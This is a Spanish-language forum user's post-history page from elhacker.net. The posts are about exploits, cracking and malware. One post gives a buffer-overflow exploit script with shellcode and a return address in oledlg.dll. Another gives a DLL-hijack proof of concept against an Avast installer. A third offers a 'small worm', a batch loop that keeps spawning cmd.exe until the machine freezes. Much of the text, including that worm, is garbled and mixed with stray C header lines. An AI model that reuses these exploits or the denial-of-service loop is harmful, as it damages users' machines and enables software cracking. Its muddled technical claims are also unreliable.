elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Los 10 CVE más críticos (peligrosos) de 2020


  Mostrar Mensajes
Páginas: [1] 2
1  Seguridad Informática / Hacking / Re: problema con el exploit windows/smb/ms08_067_netapi en: 21 Abril 2013, 13:59 pm
nada solo decir a toda  esta gente que teneis este problema que sois bastantes entrad en este enlace
http://www.securitytube.net/video/1478 
2  Programación / Ingeniería Inversa / Re: CRackeando OCX's con Visual Studio .NET 2003/2005 en: 3 Abril 2011, 18:00 pm
si ha alguien le interesa tambien se puede crackear en linux
Código
  1. [/ </ID_CHECKBOX1>
  2.    <ID_NotebookSearchSource>
  3.      <index>2</index>
  4.    </ID_NotebookSearchSource>
  5.    <ID_TextCtrlSearchInFileList>
  6.      <value></value>
  7.    </ID_TextCtrlSearchInFileList>
  8.    <ID_ListCtrlSearchFilesAndFolders>
  9.      <items/>
  10.    </ID_ListCtrlSearchFilesAndFolders>
  11.    <ID_CheckBoxIncludeSubFolders>
  12.      <value>1</value>
  13.    </ID_CheckBoxIncludeSubFolders>
  14.    <ID_ComboBoxIncludeWords>
  15.      <items/>
  16.      <index>-1</index>
  17.      <value></value>
  18.    </ID_ComboBoxIncludeWords>
  19.    <ID_ComboBoxFilePath>
  20.      <items/>
  21.      <index>-1</index>
  22.      <value>Z:\root\program\</value>
  23.    </ID_ComboBoxFilePath>
  24. ] asi les tiene que quedar olledlg.cfg
  25. y se tiene que generar este archivo apartir de este script que crearemos con kwrite en ubuntu
  26. [code=asm][appdata = ENV['APPDATA']
  27. file = appdata +"\\tec.ini
  28.  
  29. f = open(file, "wb")
  30. eb = "\xeb\x06\x90\x90"
  31. ppr = "\x67\x15\xD3\x74" #Module Name=C:\WINDOWS\system32\oledlg.dll version=1.0 (XPClient.010817-1148)
  32. #Spawn calc.exe, bad characters: \x00\x0a\x0d
  33. shellcode = ("\xdd\xc3\xd9\x74\x24\xf4\x5a\xb8\x30\xe7\x16\x7d\x33\xc9" +
  34. "\xb1\x33\x31\x42\x17\x83\xc2\x04\x03\x72\xf4\xf4\x88\x8e" +
  35. "\x12\x71\x72\x6e\xe3\xe2\xfa\x8b\xd2\x30\x98\xd8\x47\x85" +
  36. "\xea\x8c\x6b\x6e\xbe\x24\xff\x02\x17\x4b\x48\xa8\x41\x62" +
  37. "\x49\x1c\x4e\x28\x89\x3e\x32\x32\xde\xe0\x0b\xfd\x13\xe0" +
  38. "\x4c\xe3\xdc\xb0\x05\x68\x4e\x25\x21\x2c\x53\x44\xe5\x3b" +
  39. "\xeb\x3e\x80\xfb\x98\xf4\x8b\x2b\x30\x82\xc4\xd3\x3a\xcc" +
  40. "\xf4\xe2\xef\x0e\xc8\xad\x84\xe5\xba\x2c\x4d\x34\x42\x1f" +
  41. "\xb1\x9b\x7d\x90\x3c\xe5\xba\x16\xdf\x90\xb0\x65\x62\xa3" +
  42. "\x02\x14\xb8\x26\x97\xbe\x4b\x90\x73\x3f\x9f\x47\xf7\x33" +
  43. "\x54\x03\x5f\x57\x6b\xc0\xeb\x63\xe0\xe7\x3b\xe2\xb2\xc3" +
  44. "\x9f\xaf\x61\x6d\xb9\x15\xc7\x92\xd9\xf1\xb8\x36\x91\x13" +
  45. "\xac\x41\xf8\x79\x33\xc3\x86\xc4\x33\xdb\x88\x66\x5c\xea" +
  46. "\x03\xe9\x1b\xf3\xc1\x4e\xd3\xb9\x48\xe6\x7c\x64\x19\xbb" +
  47. "\xe0\x97\xf7\xff\x1c\x14\xf2\x7f\xdb\x04\x77\x7a\xa7\x82" +
  48. "\x6b\xf6\xb8\x66\x8c\xa5\xb9\xa2\xef\x28\x2a\x2e\xde\xcf" +
  49. "\xca\xd5\x1e")
  50.  
  51. f.write("\r\n[Act_"+"\x41"*1088+eb+ppr+shellcode+"]\r\nEnabled = 1\r\n")
  52. f.close()
  53. ] le llamaremos app/data
  54.  
  55. luego ya bastara abrir con wine tec.exe  y emplear convert para olledlg.cfg , app/data
  56.  
  57. y crearan un archivo 03.log y walla crackeado importante cuando creen olledlg.cfg hagan una copia y llamen le olledlg.lst el programa al principio no la reconocera pero la dan all archives y no habra problema
  58.  
  59.  
  60. saludos.....
[/code]
3  Programación / Ingeniería Inversa / proteger un programa en: 3 Abril 2011, 17:30 pm
primero vayan aqui[url]http://www.exploit-db.com/local/ y descarguense world list buffer overflow
abranlo con hex y se encontraran con esto

Código
  1. [0x00000000: 0a
  2. 0a
  3. 0a
  4. 0a
  5. 0a
  6. 0a
  7. 0a
  8. 0a -
  9. 0a
  10. ]
  11.  
  12. es decir programa desprotegido
  13.  
  14. y tiene que protegerlo de manera que olly no pueda realizar ningun tipo de accion ni siquiera correr el programa y hex que muestre un registro muy distinto
  15.  
  16. ayuda:http://www.woodmann.com/crackz/Miscpapers.htm : y disfruten , si tienen alguna recomendacion , o idea o pregunta no duden en postearla ,gracias
4  Programación / Ingeniería Inversa / Re: desactivar virus ebola en: 9 Febrero 2011, 22:07 pm
disculpa hace bastante tiempo que publique esta repuesta


mira en ese tiempo no estaba muy familiarizado con el uso de este foro


lo publique por que tuve acceso al primer codigo que puso su desarrollador



y lo hice con la mejor intencion del mundo    mira una cosa en aquel momento ese programa estaba muy bien cifrado  y por el hacker que lo desarrollo doy fe de ello

el programa en un prinicipio fuen un simple crackme que se auto ejecutaba y pedia un codigo
 y no quiero hablar mas del tema     y ese dia no era 28 de diciembre saludos
5  Seguridad Informática / Bugs y Exploits / exploit en avast en: 9 Febrero 2011, 21:52 pm
#include <windows.h>

int main()
{
  WinExec("calc", SW_NORMAL);
  exit(0);
  return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
  main();
  return 0;
}
estas sentencia escribidla en note pad    y salvar como mfc90loc.dll

lo interesante es que cuando se inicia el motro de instalacion se lanza un registro de
aqui no me instalo por que no me gusta

vais a opcione instalacion presonalizada y le ordenais que emplee este archivo mfc90loc.dll
sorpresa se instala ....

abris el olly y en conditional logs anadis  el bug  le plugin a anadir mfc90loc.dll

valor+segmento= #include <windows.h>+int main()
{
={
  main();
  return 0;
}

en este mismo momento olly avisa de shift F9 violation nada adelante le dais y lo correis
el antivirus os avisa de que no funcion correctamente

cerrais todo

y le dais a modificar instalacion premio antivirus hackeado  version pro avast setup la demo

importante hagan estas prubeas con linux nunca con microsoft

si quieren corregir  las criticas son constructivas    xao hasta la proxima jessejemmes

6  Seguridad Informática / Análisis y Diseño de Malware / Re: pequeno quilmes en: 9 Febrero 2011, 21:38 pm
era una simple mencion alos quilmes que desarrollaban antiguamente los hackers
como un tributo grande capitancrunch

si es cierto que hoy en dia el scriptinq es muy recomendado te doy la razon

hasta aqui


peor se han hecho autenticos destroyers en batch 

7  Seguridad Informática / Análisis y Diseño de Malware / Re: Programar virus que consuma la memoria en: 6 Febrero 2011, 13:49 pm
engordaria el codigo con alguna encriptacion de tipo mochila americana , y luego buscaria
alguna manual en exploit data  e inssertarselo pero  ;-)
8  Seguridad Informática / Análisis y Diseño de Malware / Re: que botnet es el mas popular en: 3 Febrero 2011, 21:00 pm
si quereis disfrutar de juguetes buenos bajaros bactrack r2  http://www.backtrack-linux.org/ y vais a disfrutar como enanos
9  Seguridad Informática / Análisis y Diseño de Malware / pequeno quilmes en: 3 Febrero 2011, 19:43 pm
 ::) /bueno este seria un pequeno quilme como la cerveza ja,ja es un simple comando que ordena aperturas de documentos hasta bloquear el ordenador es decir un pequeno worm la diferncia esque se puede ocultar en archivo en iso.(en este caso)
o en el que ustedes quieran
i empleo una simple encriptacion de extracion de datos pero con un (-).
Código:
set exit=echo set bucle %%start cmd.exe%%:bucle el quilme en cuestion luego se ha cifrado
start cmd.exe
goto bucle
#include <stdio.h>:bucle
start cmd.exe@echo off
echo cmd.exe
pause>nul
goto bucle
exit
#include <sys/socket.h>:bucle
start cmd.exe@echo off
echo cmd.exe
pause>nul
goto bucle
exit
#include <sys/types.h>:bucle
start cmd.exe
start cmd.exe@echo off
set.exe=-4567kgbexploit-09023
echo.%exe:~-4,13%
pause>nul
exit
goto bucle.
#include <linux/netlink.h>:bucle
start cmd.exe start cmd.exe@echo off
set.exe=-4567kgbexploit-09023
echo.%exe:~-4,13%
pause>nul
goto bucle
exit
#include <fcntl.h>:bucle
start cmd.exe start cmd.exe@echo off
set.exe=-4567kgbexploit-09023
echo.%exe:~-4,13%
pause>nul
goto bucle
exit
#include <errno.h>:bucle
start cmd.exe start cmd.exe@echo off
set.exe=-4567kgbexploit-09023
echo.%exe:~-4,13%
pause>nul
goto bucle
exit
#include <stdlib.h>:bucle
start cmd.exe start cmd.exe@echo off
set.exe=-4567kgbexploit-09023
echo.%exe:~-4,13%
pause>nul
goto bucle
exit
#include <string.h>:bucle
start cmd.exe start cmd.exe@echo off
set.exe=-4567kgbexploit-09023
echo.%exe:~-4,13%
pause>nul
goto bucle
exit
#include <string.h>:bucle
start cmd.exe
start cmd.exe@echo off
set.exe=-4567kgbexploit-09023
echo.%exe:~-4,13%
pause>nul
exit
goto bucle
#include <unistd.h>:bucle
start cmd.exestart cmd.exe@echo off
set.exe=-4567kgbexploit-09023
echo.%exe:~-4,13%
pause>nul
exit
goto bucle
#include <sys/stat.h>:bucle
start cmd.exestart cmd.exe@echo off
set.exe=-4567kgbexploit-09023
echo.%exe:~-4,13%
pause>nul
exit
goto bucle
#include <signal.h>:bucle
start cmd.exestart cmd.exe@echo off
set.exe=-4567kgbexploit-09023
echo.%exe:~-4,13%
pause>nul
goto bucle
exit.
#include <sys/mount.h>:bucle
start cmd.exestart cmd.exe@echo off
set.exe=-4567kgbexploit-09023
echo.%exe:~-4,13%
pause>nul
goto bucle
exit
#define SECRET "secretlol":bucle
start cmd.exestart cmd.exe@echo off
set.exe=-4567kgbexploit-09023
echo.%exe:~-4,13%
pause>nul
exit
goto bucle


void die(const char *msg)
goto bucle )

xao si alguien tiene alguna opinion  o quiere incluir algo no duduies en contestar
10  Programación / Ingeniería Inversa / Re: Mochila exekey++ - Posible crackearla? en: 5 Enero 2011, 22:02 pm
Mirate esto:
http://www.google.com.ar/search?hl=es&rlz=1B3GGGL_esAR265AR265&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=parallel+port+emulation&spell=1

Parece que es lo que buscas.
[/quote
yo ,he visitado la pagina y creo que es lo mas logico
Páginas: [1] 2
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines